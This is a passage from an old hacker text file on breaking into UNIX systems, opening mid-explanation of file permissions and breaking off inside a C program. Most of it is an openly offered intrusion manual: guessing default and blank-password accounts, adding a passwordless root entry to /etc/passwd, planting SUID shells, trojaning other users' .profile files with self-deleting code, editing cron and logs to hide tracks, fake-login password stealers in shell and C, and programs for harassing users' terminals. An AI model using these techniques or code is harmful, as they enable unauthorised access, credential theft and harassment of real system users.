across it, but was in the "users" group. The group permissions would not<br />
apply to him, meaning he would have no permissions, so he couldn't touch<br />
the file, right? Sorta. There is a third group of permissions, and this is<br />
the "other" group. This means that the permissions in the "other" group<br />
apply to everyone but the owner, and the users in the same group as the file.<br />
Look at the directory entry above. the r-x-rwxr-- is the permissions line.<br />
The first three characters are the permissions for the owner (r-x). The<br />
"r-x" translates to "Read and execute permissions, but no write permissions"<br />
the second set of three, r-xRWXr-- (the ones in capital letters) are the group<br />
permissions. Those three characters mean "Read, write, and execution allowed"<br />
The 3rd set, r-xrwxR-- is the permissions for everyone else. It means<br />
"Reading allowed, but nothing else". A directory would look something like<br />
this:<br />
$ ls -l<br />
drwxr-xr-x sirhack root 342 March 11 src<br />
<br />
A directory has a "d" at the beggining of the permissions line. Now, the<br />
owner of the directory (sirhack) can read from the directory, write in the<br />
directory, and execute programs from the directory. The root group and every-<br />
one else can only read from the directory, and execute off the directory.<br />
So, If I changed the directory to be executable only, this is<br />
what it would look like:<br />
$ chmod go-r<br />
$ ls<br />
drwx--x--x sirhack root 342 March 11 src<br />
<br />
Now, if someone went into the directory besides "sirhack", they could only<br />
execute programs in the directory. If they did an "ls" to get a directory<br />
of src, when they were inside src, it would say "cannot read directory".<br />
If there is a file that is readable in the directory, but the directory is<br />
not readable, it is sometimes possible to read the file anyway.<br />
<br />
If you do not have execute permissions in a directory, you won't be able to<br />
execute anything in the directory, most of the time.<br />
<br />
_____________________________________________________________________________<br />
<br />
--------------<br />
Hacking:<br />
--------------<br />
The first step in hacking a UNIX is to get into the operating system<br />
by finding a valid account/password. The object of hacking is usually to<br />
get root (full privileges), so if you're lucky enough to get in as root,<br />
you need not read anymore of this hacking phile , and get into the<br />
"Having Fun" Section. Hacking can also be just to get other's accounts also.<br />
<br />
Getting IN<br />
----------<br />
The first thing to do is to GET IN to the Unix. I mean, get past<br />
the login prompt. That is the very first thing. When you come across a UNIX,<br />
sometimes it will identify itself by saying something like,<br />
"Young INC. Company UNIX"<br />
<br />
or Just<br />
"Young Inc. Please login"<br />
<br />
Here is where you try the defaults I listed. If you get in with those<br />
you can get into the more advanced hacking (getting root). If you do something<br />
wrong at login, you'll get the message<br />
"login incorrect"<br />
This was meant to confuse hackers, or keep the wondering. Why?<br />
Well, you don't know if you've enterred an account that does not exist, or one<br />
that does exist, and got the wrong password. If you login as root and it says<br />
"Not on Console", you have a problem. You have to login as someone else,<br />
and use SU to become root.<br />
<br />
Now, this is where you have to think. If you cannot get in with a<br />
default, you are obviously going to have to find something else to<br />
login as. Some systems provide a good way to do this by allowing the use<br />
of command logins. These are ones which simply execute a command, then<br />
logoff. However, the commands they execute are usually useful. For instance<br />
there are three common command logins that tell you who is online at the<br />
present time. They are:<br />
who<br />
rwho<br />
finger<br />
<br />
If you ever successfully get one of these to work, you can write down<br />
the usernames of those online, and try to logon as them. Lots of unsuspecting<br />
users use there login name as their password. For instance, the user<br />
"bob" may have a password named "bob" or "bob1". This, as you know, is<br />
not smart, but they don't expect a hacking spree to be carried out on<br />
them. They merely want to be able to login fast.<br />
If a command login does not exist, or is not useful at all, you will<br />
have to brainstorm. A good thing to try is to use the name of the unix<br />
that it is identified as. For instance, Young INC's Unix may have an account<br />
named "young"<br />
Young, INC. Please Login.<br />
login: young<br />
UNIX SYSTEM V REL 3.2<br />
(c)1984 AT&T..<br />
..<br />
..<br />
..<br />
<br />
Some unixes have an account open named "test". This is also a default,<br />
but surprisingly enough, it is sometimes left open. It is good to try to<br />
use it. Remember, brainstorming is the key to a unix that has no apparent<br />
defaults open. Think of things that may go along with the Unix. type<br />
in stuff like "info", "password", "dial", "bbs" and other things that<br />
may pertain to the system. "att" is present on some machines also.<br />
<br />
ONCE INSIDE -- SPECIAL FILES<br />
----------------------------<br />
There are several files that are very important to the UNIX<br />
environment. They are as follows:<br />
<br />
/etc/passwd - This is probably the most important file on a Unix. Why?<br />
well, basically, it holds the valid usernames/passwords.<br />
This is important since only those listed in the passwd<br />
file can login, and even then some can't (will explain).<br />
The format for the passwordfile is this:<br />
<br />
username:password:UserID:GroupID:description(or real name):homedir:shell<br />
<br />
Here are two sample entries:<br />
<br />
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh<br />
demo::101:100:Test Account:/usr/demo:/usr/sh<br />
<br />
In the first line, sirhack is a valid user. The second<br />
field, however, is supposed to be a password, right? Well,<br />
it is, but it's encrypted with the DES encryption standard.<br />
the part that says "&a,Ty" may include a date after the comma<br />
(Ty) that tells unix when the password expires. Yes, the<br />
date is encrypted into two alphanumeric characters (Ty).<br />
<br />
In the Second example, the demo account has no password.<br />
so at Login, you could type in:<br />
<br />
login: demo<br />
UNIX system V<br />
(c)1984 AT&T<br />
..<br />
..<br />
<br />
But with sirhack, you'd have to enter a password. Now,<br />
the password file is great, since a lot of times, you;ll<br />
be able to browse through it to look for unpassworded<br />
accounts. Remember that some accounts can be restricted<br />
from logging in, as such:<br />
<br />
bin:*:2:2:binaccount:/bin:/bin/sh<br />
<br />
The '*' means you won't be able to login with it. Your<br />
only hope would be to run an SUID shell (explained later).<br />
<br />
A note about the DES encryption: each unix makes its own unique<br />
"keyword" to base encryption off of. Most of the time its just random letters<br />
and numbers. Its chosen at installation time by the operating system.<br />
Now, decrypting DES encrypted things ain't easy. Its pretty much<br />
impossible. Especially decrypting the password file (decrypting the password<br />
field within the password file to be exact). Always beware a hacker who<br />
says he decrypted a password file. He's full of shit. Passwords are<br />
never decrypted on unix, but rather, a system call is made to a function<br />
called "crypt" from within the C language, and the string you enter as<br />
the password gets encrypted, and compared to the encrypted password. If<br />
they match, you're in. Now, there are password hackers, but they donot<br />
decrypt the password file, but rather, encrypt words from a dictionary<br />
and try them against every account (by crypting/comparing) until it finds<br />
a match (later on!). Remember, few, if none, have decrypted the password<br />
file successfuly.<br />
<br />
/etc/group - This file contains The valid groups. The group file is usually<br />
defined as this:<br />
groupname:password:groupid:users in group<br />
<br />
Once again, passwords are encrypted here too. If you see a blank<br />
in the password entry you can become part of that group by<br />
using the utility "newgrp". Now, there are some cases in<br />
which even groups with no password will allow only certain<br />
users to be assigned to the group via the newgrp command. Usually,<br />
if the last field is left blank, that means any user can use newgrp<br />
to get that group's access. Otherwise, only the users specified in<br />
the last field can enter the group via newgrp.<br />
<br />
Newgrp is just a program that will change your group current<br />
group id you are logged on under to the one you specify. The<br />
syntax for it is: newgrp groupname<br />
Now, if you find a group un passworded, and use newgrp to<br />
enter it, and it asks for a password, you are not allowed to use<br />
the group. I will explain this further in The "SU & Newgrp" section.<br />
<br />
/etc/hosts - this file contains a list of hosts it is connected to thru<br />
a hardware network (like an x.25 link or something), or sometimes<br />
just thru UUCP. This is a good file when you are hacking a<br />
large network, since it tells you systems you can use with<br />
rsh (Remote Shell, not restricted shell), rlogin, and telnet,<br />
as well as other ethernet/x.25 link programs.<br />
<br />
/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in<br />
Several directories, but it is usually in /usr/adm. This file<br />
is what it sounds like. Its a log file, for the program SU.<br />
What it is for is to keep a record of who uses SU and when.<br />
whenever you use SU, your best bet would be to edit this file<br />
if possible, and I'll tell you how and why in the section<br />
about using "su".<br />
<br />
/usr/adm/loginlog<br />
or /usr/adm/acct/loginlog -<br />
This is a log file, keeping track of the logins.<br />
Its purpose is merely for accounting and "security review". Really,<br />
sometimes this file is never found, since a lot of systems keep the<br />
logging off.<br />
<br />
/usr/adm/errlog<br />
or errlog - This is the error log. It could be located anywhere. It<br />
keeps track of all serious and even not so serious errors.<br />
Usually, it will contain an error code, then a situation.<br />
the error code can be from 1-10, the higher the number, the<br />
worse the error. Error code 6 is usually used when you try<br />
to hack. "login" logs your attempt in errlog with error code<br />
6. Error code 10 means, in a nutshell, "SYSTEM CRASH".<br />
<br />
/usr/adm/culog - This file contains entries that tell when you used cu,<br />
where you called and so forth. Another security thing.<br />
<br />
/usr/mail/<userlogin> - this is where the program "mail" stores its mail.<br />
to read a particular mailbox, so they are called,<br />
you must be that user, in the user group "mail" or<br />
root. each mailbox is just a name. for instance,<br />
if my login was "sirhack" my mail file would usually<br />
be: /usr/mail/sirhack<br />
<br />
/usr/lib/cron/crontabs - This contains the instructions for cron, usually.<br />
Will get into this later.<br />
<br />
/etc/shadow - A "shadowed" password file. Will talk about this later.<br />
<br />
<br />
-- The BIN account --<br />
<br />
Well, right now, I'd like to take a moment to talk about the account<br />
"bin". While it is only a user level account, it is very powerful. It is<br />
the owner of most of the files, and on most systems, it owns /etc/passwd,<br />
THE most important file on a unix. See, the bin account owns most of the<br />
"bin" (binary) files, as well as others used by the binary files, such<br />
as login. Now, knowing what you know about file permissions, if bin owns<br />
the passwd file, you can edit passwd and add a root entry for yourself.<br />
You could do this via the edit command:<br />
$ ed passwd<br />
10999 [The size of passwd varies]<br />
* a<br />
sirhak::0:0:Mr. Hackalot:/:/bin/sh<br />
{control-d}<br />
* w<br />
* q<br />
$<br />
<br />
Then, you could say: exec login, then you could login as sirhack, and<br />
you'd be root.<br />
<br />
/\/\/\/\/\/\/\/\/<br />
Hacking..........<br />
/\/\/\/\/\/\/\/\/<br />
<br />
--------------<br />
Account Adding<br />
--------------<br />
<br />
There are other programs that will add users to the system, instead<br />
of ed. But most of these programs will NOT allow a root level user to be<br />
added, or anything less than a UID of 100. One of these programs is<br />
named "adduser". Now, the reason I have stuck this little section in, is<br />
for those who want to use a unix for something useful. Say you want a<br />
"mailing address". If the unix has uucp on it, or is a big college,<br />
chances are, it will do mail transfers. You'll have to test the unix<br />
by trying to send mail to a friend somewhere, or just mailing yourself.<br />
If the mailer is identified as "smail" when you mail yourself (the program<br />
name will be imbedded in the message) that probably means that the system<br />
will send out UUCP mail. This is a good way to keep in contact with people.<br />
Now, this is why you'd want a semi-permanent account. The way to achieve this<br />
is by adding an account similar to those already on the system. If all the<br />
user-level accounts (UID >= 100) are three letter abbriviations, say<br />
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account<br />
via adduser, and make a name like sally jane marshall or something<br />
(they don't expect hackers to put in female names) and have the account<br />
named sjm. See, in the account description (like Mr. Hackalot above), that<br />
is where the real name is usually stored. So, sjm might look like this:<br />
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh<br />
Of course, you will password protect this account, right?<br />
Also, group id's don't have to be above 100, but you must put the account<br />
into one that exists. Now, once you login with this account, the first<br />
thing you'd want to do is execute "passwd" to set a password up. If you<br />
don't, chances are someone else 'll do it for you (Then you'll be SOL).<br />
<br />
-------------------<br />
Set The User ID<br />
-------------------<br />
<br />
This is porbably one of the most used schemes. Setting up an "UID-<br />
Shell". What does this mean? Well, it basically means you are going<br />
to set the user-bit on a program. The program most commonly used is<br />
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access<br />
to whatever the owner of the file does. A UID shell sets the user-ID of<br />
the person who executes it to the owner of the program. So if root<br />
owns a uid shell, then you become root when you run it. This is an<br />
alternate way to become root.<br />
<br />
Say you get in and modify the passwd file and make a root level<br />
account unpassworded, so you can drop in. Of course, you almost HAVE to<br />
get rid of that account or else it WILL be noticed eventually. So, what<br />
you would do is set up a regular user account for yourself, then, make<br />
a uid shell. Usually you would use /bin/sh to do it. After adding<br />
the regular user to the passwd file, and setting up his home directory,<br />
you could do something like this:<br />
(assume you set up the account: shk)<br />
# cp /bin/sh /usr/shk/runme<br />
# chmod a+s /usr/shk/runme<br />
<br />
Thats all there would be to it. When you logged in as shk, you could just<br />
type in:<br />
<br />
$ runme<br />
#<br />
<br />
See? You'd then be root. Here is a thing to do:<br />
<br />
$ id<br />
uid=104(shk) gid=50(user)<br />
<br />
$ runme<br />
# id<br />
uid=104(shk) gid=50(user) euid=0(root)<br />
#<br />
<br />
The euid is the "effective" user ID. UID-shells only set the effective<br />
userid, not the real user-id. But, the effective user id over-rides the<br />
real user id. Now, you can, if you wanted to just be annoying, make<br />
the utilities suid to root. What do I mean? For instance, make 'ls'<br />
a root 'shell'. :<br />
<br />
# chmod a+s /bin/ls<br />
# exit<br />
$ ls -l /usr/fred<br />
..<br />
......<br />
etc crap<br />
<br />
Ls would then be able to pry into ANY directory. If you did the same to<br />
"cat" you could view any file. If you did it to rm, you could delete any<br />
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on<br />
the system (usually).<br />
<br />
<br />
How do I get root?<br />
------------------<br />
<br />
Good question indeed. To make a program set the user-id shell to root,<br />
you have to be root, unless you're lucky. What do I mean? Well, say<br />
you find a program that sets the user-id to root. If you have access<br />
to write to that file, guess what? you can copy over it, but keep<br />
the uid bit set. So, say you see that the program chsh is setting<br />
the user id too root. You can copy /bin/sh over it.<br />
<br />
$ ls -l<br />
rwsrwsrws root other 10999 Jan 4 chsh<br />
$ cp /bin/sh chsh<br />
$ chsh<br />
#<br />
<br />
See? That is just one way. There are others, which I will now talk<br />
about.<br />
<br />
More on setting the UID<br />
-----------------------<br />
<br />
Now, the generic form for making a program set the User-ID bit<br />
is to use this command:<br />
<br />
chmod a+s file<br />
<br />
Where 'file' is a valid existing file. Now, only those who own the file<br />
can set the user ID bit. Remember, anything YOU create, YOU own, so if<br />
you copy th /bin/sh, the one you are logged in as owns it, or IF the<br />
UID is set to something else, the New UID owns the file. This brings<br />
me to BAD file permissions.<br />
<br />
<br />
<br />
II. HACKING : Bad Directory Permissions<br />
<br />
Now, what do I mean for bad directory permissions? Well, look for<br />
files that YOU can write to, and above all, DIRECTORIES you can write to.<br />
If you have write permissions on a file, you can modify it. Now, this comes<br />
in handy when wanting to steal someone's access. If you can write to<br />
a user's .profile, you are in business. You can have that user's .profile<br />
create a suid shell for you to run when You next logon after the user.<br />
If the .profile is writable to you, you can do this:<br />
<br />
$ ed .profile<br />
[some number will be here]<br />
? a<br />
cp /bin/sh .runme<br />
chmod a+x .runme<br />
chmod a+s .runme<br />
(control-d)<br />
? w<br />
[new filesize will be shown]<br />
? q<br />
$<br />
<br />
Now, when the user next logs on, the .profile will create .runme which<br />
will set your ID to the user whose .profile you changed. Ideally, you'll<br />
go back in and zap those lines after the suid is created, and you'll create<br />
a suid somewhere else, and delete the one in his dir. The .runme will<br />
not appear in the user's REGULAR directory list, it will only show up<br />
if he does "ls -a" (or ls with a -a combination), because, the '.' makes<br />
a file hidden.<br />
<br />
The above was a TROJAN HORSE, which is one of the most widely used/abused<br />
method of gaining more power on a unix. The above could be done in C via<br />
the system() command, or by just plain using open(), chmod(), and the like.<br />
* Remember to check and see if the root user's profile is writeable *<br />
* it is located at /.profile (usually) *<br />
<br />
<br />
The BEST thing that could happen is to find a user's directory writeable<br />
by you. Why? well, you could replace all the files in the directory<br />
with your own devious scripts, or C trojans. Even if a file is not<br />
writeable by you, you can still overwrite it by deleteing it. If you<br />
can read various files, such as the user's .profile, you can make a<br />
self deleting trojan as so:<br />
<br />
$ cp .profile temp.pro<br />
$ ed .profile<br />
1234<br />
? a<br />
cp /bin/sh .runme<br />
chmod a+x .runme<br />
chmod a+s .runme<br />
mv temp.pro .profile<br />
(control-d)<br />
? w<br />
[another number]<br />
? q<br />
$ chown that_user temp.pro<br />
<br />
What happens is that you make a copy of the .profile before you change it.<br />
Then, you change the original. When he runs it, the steps are made, then<br />
the original version is placed over the current, so if the idiot looks in<br />
his .profile, he won't see anything out of the ordinary, except that he<br />
could notice in a long listing that the change date is very recent, but<br />
most users are not paranoid enough to do extensive checks on their files,<br />
except sysadm files (such as passwd).<br />
<br />
Now, remember, even though you can write to a dir, you may not be able<br />
to write to a file without deleting it. If you do not have write perms<br />
for that file, you'll have to delete it and write something in its place<br />
(put a file with the same name there). The most important thing to remember<br />
if you have to delete a .profile is to CHANGE the OWNER back after you<br />
construct a new one (hehe) for that user. He could easily notice that his<br />
.profile was changed and he'll know who did it. YES, you can change the<br />
owner to someone else besides yourself and the original owner (as to throw<br />
him off), but this is not wise as keeping access usually relies on the fact<br />
that they don't know you are around.<br />
<br />
You can easily change cron files if you can write to them. I'm not going<br />
to go into detail about cronfile formats here, just find the crontab files<br />
and modify them to create a shell somewhere as root every once in a while,<br />
and set the user-id.<br />
<br />
III. Trojan Horses on Detached terminals.<br />
Basically this: You can send garbage to a user's screen and<br />
mess him up bad enough to force a logoff, creating a detached<br />
account. Then you can execute a trojan horse off that terminal in<br />
place of login or something, so the next one who calls can hit the<br />
trojan horse. This USUALLY takes the form of a fake login and<br />
write the username/pw entererred to disk.<br />
<br />
Now, there are other trojan horses available for you to write. Now,<br />
don't go thinking about a virus, for they don't work unless ROOT runs<br />
them. Anyway, a common trjan would be a shell script to get the<br />
password, and mail it to you. Now, you can replace the code for<br />
the self deleting trojan with one saying something like:<br />
echo "login: \c"<br />
read lgin<br />
echo off (works on some systems)<br />
(if above not available...: stty -noecho)<br />
echo "Password:\c"<br />
read pw<br />
echo on<br />
echo "Login: $lgin - Pword: $pw" | mail you<br />
<br />
Now, the best way to use this is to put it in a seperate script file<br />
so it can be deleted as part of the self deleting trojan. A quick<br />
modification, removing the "login: " and leaving the password<br />
may have it look like SU, so you can get the root password. But<br />
make sure the program deletes itself. Here is a sample trojan<br />
login in C:<br />
<br />
#include <stdio.h><br />
/* Get the necessary defs.. */<br />
main()<br />
{<br />
char *name[80];<br />
char *pw[20];<br />
FILE *strm;<br />
printf("login: ");<br />
gets(name);<br />
pw = getpass("Password:");<br />
strm = fopen("/WhereEver/Whateverfile","a");<br />
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);<br />
fclose(strm);<br />
/* put some kind of error below... or something... */<br />
printf("Bus Error - Core Dumped\n");<br />
exit(1);<br />
}<br />
<br />
The program gets the login, and the password, and appends it to<br />
a file (/wherever/whateverfile), and creates the file if it can,<br />
and if its not there. That is just an example. Network Annoyances<br />
come later.<br />
<br />
IV. Odd systems<br />
<br />
There may be systems you can log in to with no problem, and find some<br />
slack menu, database, or word processor as your shell, with no way to the<br />
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will<br />
let you login as root, but give you a menu which will allow you to add an<br />
account. However, ones that do this usually have some purchased software<br />
package running, and the people who made the software KNOW that the people<br />
who bought it are idiots, and the thing will sometimes only allow you to<br />
add accounts with user-id 100 or greater, with their special menushell as<br />
a shell. You probably won't get to pick the shell, the program will probably<br />
stick one on the user you created which is very limiting. HOWEVER, sometimes<br />
you can edit accounts, and it will list accounts you can edit on the screen.<br />
HOWEVER, these programs usually only list those with UIDS > 100 so you don't<br />
edit the good accounts, however, they donot stop you from editing an account<br />
with a UID < 100. The "editing" usually only involves changing the password<br />
on the account. If an account has a * for a password, the standard passwd<br />
program which changes programs, will say no pw exists, and will ask you to<br />
enter one. (wallah! You have just freed an account for yourself. Usually<br />
bin and sys have a * for a password). If one exists you'll have to enter<br />
the old Password (I hope you know it!) for that account. Then, you are<br />
in the same boat as before. (BTW -- These wierd systems are usually<br />
Xenix/386, Xenix/286, or Altos/286)<br />
With word processors, usually you can select the load command,<br />
and when the word processor prompts for a file, you can select the passwd<br />
file, to look for open accounts, or at least valid ones to hack. An example<br />
would be the informix system. You can get a word processor with that such<br />
as Samna word, or something, and those Lamers will not protect against<br />
shit like that. Why? The Passwd file HAS to be readable by all for the most<br />
part, so each program can "stat" you. However, word processors could be made<br />
to restrict editing to a directory, or set of directories. Here is an<br />
example:<br />
<br />
$ id<br />
uid=100(sirhack) gid=100(users)<br />
$ sword<br />
(word processor comes up)<br />
(select LOAD A FILE)<br />
<edit file="">: /etc/passwd<br />
<loading..><br />
(you see: )<br />
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh<br />
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh<br />
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh<br />
...<br />
<br />
Now I have found an account to take over! "datawiz" will get me in with no<br />
trouble, then I can change his password, which he will not like at all.<br />
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions<br />
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which<br />
will menu drive all the important shit, even creating users, but you must<br />
have ansi or something.<br />
<br />
You can usually tell when you'll get a menu. Sometimes on UNIX<br />
SYSTEM V, when it says TERM = (termtype), and is waiting for<br />
you to press return or whatever, you will probably get a menu.. ack.<br />
<br />
V. Shadowed Password files<br />
Not much to say about this. all it is, is when every password field<br />
in the password file has an "x" or just a single character. What<br />
that does is screw you, becuase you cannot read the shadowed password<br />
file, only root can, and it contains all the passwords, so you will<br />
not know what accounts have no passwords, etc.<br />
<br />
There are a lot of other schemes for hacking unix, lots of others, from<br />
writing assembly code that modifies the PCB through self-changing code which<br />
the interrupt handler doesn't catch, and things like that. However, I do<br />
not want to give away everything, and this was not meant for advanced Unix<br />
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix<br />
assembly language or anything. Now I will Talk about Internet.<br />
<br />
<br />
<br />
--->>> InterNet <<<---<br />
Why do I want to talk about InterNet? Well, because it is a prime<br />
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).<br />
Now, mainly you will find BSD systems off of the Internet, or SunOS, for<br />
they are the most common. They may not be when System V, Rel 4.0, Version<br />
2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump<br />
from one computer to another once you are logged in. What happens is<br />
EACH system has a "yello page password file". Better known as yppasswd.<br />
If you look in there, and see blank passwords you can use rsh, rlogin, etc..<br />
to slip into that system. One system in particular I came across had a<br />
a yppasswd file where *300* users had blank passwords in the Yellow Pages.<br />
Once I got in on the "test" account, ALL I had to do was select who I wanted<br />
to be, and do: rlogin -l user (sometimes -n). Then it would log me onto<br />
the system I was already on, through TCP/IP. However, when you do this,<br />
remember that the yppasswd only pertains to the system you are on at<br />
the time. To find accounts, you could find the yppasswd file and do:<br />
<br />
% cat yppasswd | grep ::<br />
<br />
Or, if you can't find yppasswd..<br />
<br />
% ypcat passwd | grep ::<br />
<br />
On ONE system (which will remain confidential), I found the DAEMON account<br />
left open in the yppasswd file. Not bad. Anyway, through one system<br />
on the internet, you can reach many. Just use rsh, or rlogin, and look<br />
in the file: /etc/hosts for valid sites which you can reach. If you get<br />
on to a system, and rlogin to somewhere else, and it asks for a password,<br />
that just means one of two things:<br />
<br />
A. Your account that you have hacked on the one computer is on the target<br />
computer as well. Try to use the same password (if any) you found the<br />
hacked account to have. If it is a default, then it is definitly on the<br />
other system, but good luck...<br />
<br />
B. rlogin/rsh passed your current username along to the remote system, so it<br />
was like typing in your login at a "login: " prompt. You may not exist on<br />
the other machine. Try "rlogin -l login_name", or rlogin -n name..<br />
sometimes, you can execute "rwho" on another machine, and get a valid<br />
account.<br />
<br />
Some notes on Internet servers. There are "GATEWAYS" that you can get into<br />
that will allow access to MANY internet sites. They are mostly run off<br />
a modified GL/1 or GS/1. No big deal. They have help files. However,<br />
you can get a "privilged" access on them, which will give you CONTROL of<br />
the gateway.. You can shut it down, remove systems from the Internet, etc..<br />
When you request to become privileged, it will ask for a password. There is<br />
a default. The default is "system". I have come across *5* gateways with<br />
the default password. Then again, DECNET has the same password, and I have<br />
come across 100+ of those with the default privileged password. CERT Sucks.<br />
a Gateway that led to APPLE.COM had the default password. Anyone could<br />
have removed apple.com from the internet. Be advised that there are many<br />
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other<br />
University networks.<br />
<br />
--** Having Fun **--<br />
<br />
Now, if nothing else, you should atleast have some fun. No, I do not mean<br />
go trashing hardrives, or unlinking directories to take up inodes, I mean<br />
play with online users. There are many things to do. Re-direct output<br />
to them is the biggie. Here is an example:<br />
$ who<br />
loozer tty1<br />
sirhack tty2<br />
$ banner You Suck >/dev/tty1<br />
$<br />
That sent the output to loozer. The TTY1 is where I/O is being performed<br />
to his terminal (usually a modem if it is a TTY). You can repetitiously<br />
banner him with a do while statement in shell, causing him to logoff. Or<br />
you can get sly, and just screw with him. Observe this C program:<br />
<br />
#include <stdio.h><br />
#include <fcntl.h><br />
#include <string.h><br />
<br />
main(argc,argument)<br />
int argc;<br />
char *argument[];<br />
{<br />
int handle;<br />
char *pstr,*olm[80];<br />
char *devstr = "/dev/";<br />
int acnt = 2;<br />
FILE *strm;<br />
pstr = "";<br />
if (argc == 1) {<br />
printf("OL (OneLiner) Version 1.00 \n");<br />
printf("By Sir Hackalot [PHAZE]\n");<br />
printf("\nSyntax: ol tty message\n");<br />
printf("Example: ol tty01 You suck\n");<br />
exit(1);<br />
}<br />
printf("OL (OneLiner) Version 1.0\n");<br />
printf("By Sir Hackalot [PHAZE]\n");<br />
if (argc == 2) {<br />
strcpy(olm,"");<br />
printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");<br />
printf("Enter one Here => ");<br />
gets(olm);<br />
}<br />
strcpy(pstr,"");<br />
strcat(pstr,devstr);<br />
strcat(pstr,argument[1]);<br />
printf("Sending to: [%s]\n",pstr);<br />
strm = fopen(pstr,"a");<br />
if (strm == NULL) {<br />
printf("Error writing to: %s\n",pstr);<br />
printf("Cause: No Write Perms?\n");<br />
exit(2);<br />
}<br />
if (argc == 2) {<br />
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());<br />
fprintf(strm,"%s\n",olm);<br />
fclose(strm);<br />
printf("Message Sent.\n");<br />
exit(0);<br />
}<br />
if (argc > 2) { <br />
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());<br />
while (acnt <= argc - 1) {<br />
fprintf(strm,"%s ",argument[acnt]);<br />
acnt++;<br />
}<br />
fclose(strm);<br />
printf("Message sent!\n");<br />
exit(0);<br />
}<br />
}<br />
<br />
What the above does is send one line of text to a device writeable by you<br />
in /dev. If you try it on a user named "sirhack" it will notify sirhack<br />
of what you are doing. You can supply an argument at the command line, or<br />
leave a blank message, then it will prompt for one. You MUST supply a<br />
Terminal. Also, if you want to use ?, or *, or (), or [], you must not<br />
supply a message at the command line, wait till it prompts you. Example:<br />
<br />
$ ol tty1 You Suck!<br />
OL (OneLiner) Version 1.00<br />
by Sir Hackalot [PHAZE]<br />
Sending to: [/dev/tty1]<br />
Message Sent!<br />
$<br />
Or..<br />
$ ol tty1<br />
OL (OneLiner) Version 1.00<br />
by Sir Hackalot [PHAZE]<br />
Dummy! You Forgot to Supply a ONE LINE MESSAGE!<br />
Enter one here => Loozer! Logoff (NOW)!! ^G^G<br />
Sending to: [/dev/tty1]<br />
Message Sent!<br />
$<br />
<br />
You can even use it to fake messages from root. Here is another:<br />
<br />
<br />
/*<br />
* Hose another user<br />
*/<br />
<br />
#include <stdio.h><br />
#include <sys types.h=""><br />
#include <sys stat.h=""><br />
#include <signal.h><br />
#include <utmp.h><br />
#include <time.h><br />
#include <termio.h><br />
#include <sys utsname.h=""><br />
<br />
#define NMAX sizeof(ubuf.ut_name)<br />
<br />
struct utmp ubuf;<br />
struct termio oldmode, mode;<br />
struct utsname name;<br />
int yn; <br />
int loop = 0;<br />
char *realme[50] = "Unknown";<br />
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];<br />
char *histtya, *ttyname(), *strrchr(), *getenv();<br />
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();<br />
FILE *tf;<br />
<br />
main(argc, argv)<br />
int argc;<br />
char *argv[];<br />
{<br />
register FILE *uf;<br />
char c1, lastc;<br />
int goodtty = 0;<br />
long clock = time((long *) 0);<br />
struct tm *localtime();<br />
struct tm *localclock = localtime( &clock );<br />
struct stat stbuf;<br />
char psbuf[20], buf[80], window[20], junk[20];<br />
FILE *pfp, *popen();<br />
<br />
if (argc < 2) {<br />
printf("usage: hose user [ttyname]\n");<br />
exit(1);<br />
}<br />
him = argv[1];<br />
<br />
if (argc > 2)<br />
histtya = argv[2];<br />
if ((uf = fopen("/etc/utmp", "r")) == NULL) {<br />
printf("cannot open /etc/utmp\n");<br />
exit(1);<br />
}<br />
cuserid(me);<br />
if (me == NULL) {<br />
printf("Can't find your login name\n");<br />
exit(1);<br />
}<br />
mytty = ttyname(2);<br />
if (mytty == NULL) {<br />
printf("Can't find your tty\n");<br />
exit(1);<br />
}<br />
if (stat(mytty, &stbuf) < 0) {<br />
printf("Can't stat your tty -- This System is bogus.\n");<br />
}<br />
if ((stbuf.st_mode&02) == 0) {<br />
printf("You have write permissions turned off (hehe!).\n");<br />
}<br />
<br />
if (histtya) {<br />
if (!strncmp(histtya, "/dev/", 5))<br />
histtya = strrchr(histtya, '/') + 1;<br />
strcpy(histty, "/dev/");<br />
strcat(histty, histtya);<br />
}<br />
while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {<br />
if (ubuf.ut_name[0] == '\0')<br />
continue;<br />
if (!strncmp(ubuf.ut_name, him, NMAX)) {<br />
logcnt++;<br />
if (histty[0]==0) {<br />
strcpy(histty, "/dev/");<br />
strcat(histty, ubuf.ut_line);<br />
}<br />
if (histtya) {<br />
if (!strcmp(ubuf.ut_line, histtya))<br />
goodtty++;<br />
}<br />
}<br />
}<br />
fclose(uf);<br />
if (logcnt==0) {<br />
printf("%s not found! (Not logged in?)\n", him);<br />
exit(1);<br />
}<br />
<br />
if (histtya==0 && logcnt > 1) {<br />
printf("%s logged more than once\nwriting to %s\n", him, histty+5);<br />
}<br />
if (access(histty, 0) < 0) {<br />
printf("No such tty? [%s]\n",histty);<br />
exit(1);<br />
}<br />
signal(SIGALRM, timout);<br />
alarm(5);<br />
if ((tf = fopen(histty, "w")) == NULL)<br />
goto perm;<br />
alarm(0);<br />
if (fstat(fileno(tf), &stbuf) < 0)<br />
goto perm;<br />
if (geteuid() != 0 && (stbuf.st_mode&02) == 0)<br />
goto perm;<br />
ioctl(0, TCGETA, &oldmode); /* save tty state */<br />
ioctl(0, TCGETA, &mode);<br />
sigs(eof);<br />
uname(&name);<br />
